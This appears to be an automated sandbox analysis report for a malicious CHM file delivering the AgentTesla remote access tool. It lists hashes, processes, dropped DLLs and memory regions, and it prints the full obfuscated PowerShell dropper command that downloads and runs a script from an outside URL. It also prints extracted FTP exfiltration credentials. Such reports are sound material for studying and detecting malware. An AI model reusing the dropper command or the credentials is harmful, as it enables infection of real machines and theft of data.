Analysis

  • max time kernel
    291s
  • max time network
    296s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-es
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-eslocale:es-esos:windows10-2004-x64systemwindows
  • submitted
    04/05/2023, 18:41

General

  • Target

    NOTA_DE_.chm

  • Size

    17KB

  • MD5

    bb8f93b0d3d4705f5b392c86eb874026

  • SHA1

    a966e0c6a9089cb0d2109bcf3f0af6259a9b40e0

  • SHA256

    5a883d1a6f91650bdf834da1d2f95e7c02f1898dc4f9a4fed59c4b2c40b62f6d

  • SHA512

    89547138d769841ea014d5623bc007bfb668b1b4d140d9c087311484f0457aebd83cc340c2d2275d7388e1cff405f572ea886be62318b810b874d858a2ebb042

  • SSDEEP

    192:IGureT0FDCkUUKZB2FvC5bjlb/bbxR4imW4xBq34Pof:IGureT0FKUUB4alZbbbxRmNB3Pof

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://mailink.app/K72.txt

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.kamen.si
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    Motherland23@

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\NOTA_DE_.chm
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3560
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://mailink.app/K72.txt')|P
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4608
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        3⤵
        • Accesses Microsoft Outlook profiles
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:2124

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\7a258487-5a0c-4717-93fd-490530d5cdfb\AgileDotNetRT64.dll

          Filesize

          75KB

          MD5

          42b2c266e49a3acd346b91e3b0e638c0

          SHA1

          2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

          SHA256

          adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

          SHA512

          770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ekuu2lwa.1de.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\aef8bac5-5612-4e64-8c84-ab708c3a7b4d\AgileDotNetRT64.dll

          Filesize

          75KB

          MD5

          42b2c266e49a3acd346b91e3b0e638c0

          SHA1

          2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

          SHA256

          adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

          SHA512

          770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

        • C:\Users\Admin\AppData\Local\Temp\aef8bac5-5612-4e64-8c84-ab708c3a7b4d\AgileDotNetRT64.dll

          Filesize

          75KB

          MD5

          42b2c266e49a3acd346b91e3b0e638c0

          SHA1

          2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

          SHA256

          adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

          SHA512

          770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

        • memory/2124-254-0x0000000000400000-0x0000000000430000-memory.dmp

          Filesize

          192KB

        • memory/2124-263-0x00000000059B0000-0x00000000059C0000-memory.dmp

          Filesize

          64KB

        • memory/2124-262-0x0000000007120000-0x00000000072E2000-memory.dmp

          Filesize

          1.8MB

        • memory/2124-261-0x0000000006B90000-0x0000000006BE0000-memory.dmp

          Filesize

          320KB

        • memory/2124-260-0x0000000006AA0000-0x0000000006AAA000-memory.dmp

          Filesize

          40KB

        • memory/2124-259-0x0000000006E40000-0x0000000006F42000-memory.dmp

          Filesize

          1.0MB

        • memory/2124-258-0x0000000006AB0000-0x0000000006B42000-memory.dmp

          Filesize

          584KB

        • memory/2124-257-0x00000000059C0000-0x0000000005A26000-memory.dmp

          Filesize

          408KB

        • memory/2124-256-0x00000000059B0000-0x00000000059C0000-memory.dmp

          Filesize

          64KB

        • memory/2124-255-0x0000000005CF0000-0x0000000006294000-memory.dmp

          Filesize

          5.6MB

        • memory/4608-192-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-217-0x0000024D6DD60000-0x0000024D6DD77000-memory.dmp

          Filesize

          92KB

        • memory/4608-168-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-170-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-172-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-174-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-176-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-178-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-180-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-182-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-184-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-186-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-188-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-190-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-166-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-194-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-196-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-198-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-200-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-202-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-204-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-165-0x0000024D6DD10000-0x0000024D6DD36000-memory.dmp

          Filesize

          152KB

        • memory/4608-218-0x0000024D6DD60000-0x0000024D6DD77000-memory.dmp

          Filesize

          92KB

        • memory/4608-222-0x0000024D6DD60000-0x0000024D6DD77000-memory.dmp

          Filesize

          92KB

        • memory/4608-220-0x0000024D6DD60000-0x0000024D6DD77000-memory.dmp

          Filesize

          92KB

        • memory/4608-224-0x0000024D6DD60000-0x0000024D6DD77000-memory.dmp

          Filesize

          92KB

        • memory/4608-226-0x0000024D6DD60000-0x0000024D6DD77000-memory.dmp

          Filesize

          92KB

        • memory/4608-228-0x0000024D6DD60000-0x0000024D6DD77000-memory.dmp

          Filesize

          92KB

        • memory/4608-230-0x0000024D6DD60000-0x0000024D6DD77000-memory.dmp

          Filesize

          92KB

        • memory/4608-232-0x0000024D6DD60000-0x0000024D6DD77000-memory.dmp

          Filesize

          92KB

        • memory/4608-234-0x0000024D6DD60000-0x0000024D6DD77000-memory.dmp

          Filesize

          92KB

        • memory/4608-236-0x0000024D6DD60000-0x0000024D6DD77000-memory.dmp

          Filesize

          92KB

        • memory/4608-164-0x00007FFE18E30000-0x00007FFE18F7E000-memory.dmp

          Filesize

          1.3MB

        • memory/4608-157-0x0000024D6CF20000-0x0000024D6CF30000-memory.dmp

          Filesize

          64KB

        • memory/4608-156-0x0000024D6CF20000-0x0000024D6CF30000-memory.dmp

          Filesize

          64KB

        • memory/4608-155-0x0000024D6CF20000-0x0000024D6CF30000-memory.dmp

          Filesize

          64KB

        • memory/4608-154-0x0000024D6DCF0000-0x0000024D6DD04000-memory.dmp

          Filesize

          80KB

        • memory/4608-153-0x0000024D6DDE0000-0x0000024D6DEE2000-memory.dmp

          Filesize

          1.0MB

        • memory/4608-152-0x0000024D6DCA0000-0x0000024D6DCC2000-memory.dmp

          Filesize

          136KB

        • memory/4608-151-0x0000024D6DAE0000-0x0000024D6DAF0000-memory.dmp

          Filesize

          64KB

        • memory/4608-141-0x0000024D6DB10000-0x0000024D6DB92000-memory.dmp

          Filesize

          520KB

        • memory/4608-238-0x0000024D6DD60000-0x0000024D6DD77000-memory.dmp

          Filesize

          92KB